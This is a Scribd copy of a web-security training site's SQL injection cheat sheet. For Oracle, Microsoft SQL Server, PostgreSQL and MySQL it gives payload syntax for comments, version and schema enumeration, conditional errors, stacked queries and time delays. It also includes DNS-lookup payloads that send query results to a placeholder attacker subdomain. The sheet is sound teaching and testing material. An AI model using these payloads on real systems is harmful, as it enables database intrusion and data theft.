Scribd
Upload
23 views3 pages

1.1 SQL Injection Cheat Sheet

Uploaded by

tesayo7239
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
23 views3 pages

1.1 SQL Injection Cheat Sheet

Uploaded by

tesayo7239
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 3

7/5/2020 SQL injection cheat sheet | Web Security Academy

Log out My acco

Products | Solutions | Research | Academy | Daily Swig | Support

Web Security Academy >> SQL injection >> Cheat sheet

SQL injection cheat sheet


Track your progress
     
Learning materials: V
This SQL injection cheat sheet contains examples of useful syntax that you can use to perform a variety of tasks that
often arise when performing SQL injection attacks. 22%

String concatenation
Vulnerability labs: V
You can concatenate together multiple strings to make a single string.
34%
Oracle 'foo'||'bar'

Microsoft 'foo'+'bar'
PostgreSQL 'foo'||'bar' Level progress:

MySQL 'foo' 'bar' [Note the space between the two strings]
11 32
CONCAT('foo','bar') of 32 of 88 o

Substring Apprentice Practitioner Ex

You can extract part of a string, from a specified offset with a specified length. Note that the offset index is 1-based.
Each of the following expressions will return the string ba. Your level:

Oracle SUBSTR('foobar', 4, 2) NEWBIE


Ne Solve 21 more la
Microsoft SUBSTRING('foobar', 4, 2) become an appre

PostgreSQL SUBSTRING('foobar', 4, 2) See where you rank o


MySQL SUBSTRING('foobar', 4, 2) our Hall of Fame 

Comments
You can use comments to truncate a query and remove the portion of the original query that follows your input. SQL injection cheat sheet

Oracle --comment Complete


Microsoft --comment
/*comment*/
PostgreSQL --comment In this topic
/*comment*/ SQL injection 
UNION attacks 
MySQL #comment Examining the database 
-- comment [Note the space after the double dash] Blind SQL injection 
/*comment*/ SQL injection cheat sheet 

Database version
You can query the database to determine its type and version. This information is useful when formulating more All topics
complicated attacks. SQL injection 
Oracle SELECT banner FROM v$version XSS 
SELECT version FROM v$instance CSRF 
Clickjacking 
Microsoft SELECT @@version DOM-based 
PostgreSQL SELECT version() CORS 
XXE 
MySQL SELECT @@version SSRF 
Request smuggling 
Database contents Command injection 
You can list the tables that exist in the database, and the columns that those tables contain. Server-side template injecti
Directory traversal 
Oracle SELECT * FROM all_tables Access control 
SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE' Web cache poisoning 
Microsoft SELECT * FROM information_schema.tables WebSockets 
SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-
HERE'

https://portswigger.net/web-security/sql-injection/cheat-sheet 1/3
7/5/2020 SQL injection cheat sheet | Web Security Academy

PostgreSQL SELECT * FROM information_schema.tables


SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-
HERE'

MySQL SELECT * FROM information_schema.tables


SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-
HERE' Find SQL injectio
vulnerabilities us
Conditional errors
Burp Suite
You can test a single boolean condition and trigger a database error if the condition is true.

Oracle SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN to_char(1/0) ELSE NULL END FROM
dual TRY FOR FREE

Microsoft SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END

PostgreSQL SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN cast(1/0 as text) ELSE NULL END
MySQL SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM
information_schema.tables),'a')

Batched (or stacked) queries


You can use batched queries to execute multiple queries in succession. Note that while the subsequent queries are
executed, the results are not returned to the application. Hence this technique is primarily of use in relation to blind
vulnerabilities where you can use a second query to trigger a DNS lookup, conditional error, or time delay.

Oracle Does not support batched queries.

Microsoft QUERY-1-HERE; QUERY-2-HERE


PostgreSQL QUERY-1-HERE; QUERY-2-HERE
MySQL Does not support batched queries.

Time delays
You can cause a time delay in the database when the query is processed. The following will cause an unconditional
time delay of 10 seconds.

Oracle dbms_pipe.receive_message(('a'),10)

Microsoft WAITFOR DELAY '0:0:10'


PostgreSQL SELECT pg_sleep(10)
MySQL SELECT sleep(10)

Conditional time delays


You can test a single boolean condition and trigger a time delay if the condition is true.

Oracle SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN


'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual

Microsoft IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'


PostgreSQL SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0)
END
MySQL SELECT IF(YOUR-CONDITION-HERE,sleep(10),'a')

DNS lookup
You can cause the database to perform a DNS lookup to an external domain. To do this, you will need to use Burp
Collaborator client to generate a unique Burp Collaborator subdomain that you will use in your attack, and then poll
the Collaborator server to confirm that a DNS lookup occurred.

Oracle The following technique leverages an XML external entity (XXE) vulnerability to trigger a DNS lookup.
The vulnerability has been patched but there are many unpatched Oracle installations in existence:
SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE
root [ <!ENTITY % remote SYSTEM "http://YOUR-SUBDOMAIN-
HERE.burpcollaborator.net/"> %remote;]>'),'/l') FROM dual

The following technique works on fully patched Oracle installations, but requires elevated privileges:
SELECT UTL_INADDR.get_host_address('YOUR-SUBDOMAIN-
HERE.burpcollaborator.net')

Microsoft exec master..xp_dirtree '//YOUR-SUBDOMAIN-HERE.burpcollaborator.net/a'


PostgreSQL copy (SELECT '') to program 'nslookup YOUR-SUBDOMAIN-

https://portswigger.net/web-security/sql-injection/cheat-sheet 2/3
7/5/2020 SQL injection cheat sheet | Web Security Academy
HERE.burpcollaborator.net'
MySQL The following techniques work on Windows only:
LOAD_FILE('\\\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\\a')
SELECT ... INTO OUTFILE '\\\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\a'

DNS lookup with data exfiltration


You can cause the database to perform a DNS lookup to an external domain containing the results of an injected
query. To do this, you will need to use Burp Collaborator client to generate a unique Burp Collaborator subdomain that
you will use in your attack, and then poll the Collaborator server to retrieve details of any DNS interactions, including
the exfiltrated data.

Oracle SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE


root [ <!ENTITY % remote SYSTEM "http://'||(SELECT YOUR-QUERY-HERE)||'.YOUR-
SUBDOMAIN-HERE.burpcollaborator.net/"> %remote;]>'),'/l') FROM dual

Microsoft declare @p varchar(1024);set @p=(SELECT YOUR-QUERY-


HERE);exec('master..xp_dirtree "//'+@p+'.YOUR-SUBDOMAIN-
HERE.burpcollaborator.net/a"')
PostgreSQL create OR replace function f() returns void as $$
declare c text;
declare p text;
begin
SELECT into p (SELECT YOUR-QUERY-HERE);
c := 'copy (SELECT '''') to program ''nslookup '||p||'.YOUR-SUBDOMAIN-
HERE.burpcollaborator.net''';
execute c;
END;
$$ language plpgsql security definer;
SELECT f();

MySQL The following technique works on Windows only:


SELECT YOUR-QUERY-HERE INTO OUTFILE '\\\\YOUR-SUBDOMAIN-
HERE.burpcollaborator.net\a'

Stories from the Daily Swig about SQL injection

Sophos XG Firewall
0day vulnerability
Bug Bounty Radar // Ma
Bug Bounty Radar // April 2020 gets patched ParamSpider
2020
New web targets for the discerning New tool helps in the discovery of URL
27 April 2020 New web targets for the discer
hacker parameter vulnerabilities
hacker
30 April 2020 27 April 2020
31 March 2020

Burp Suite Vulnerabilities Customers Company Insights

Web vulnerability scanner Cross-site scripting (XSS) Organizations About Web Security Academy
Burp Suite Editions SQL injection Testers PortSwigger News Blog
Release Notes Cross-site request forgery Developers Careers Research
 Follow us
XML external entity injection Contact The Daily Swig
Directory traversal Legal
Server-side request forgery Privacy Notice © 2020 PortSwigger Ltd

https://portswigger.net/web-security/sql-injection/cheat-sheet 3/3

You might also like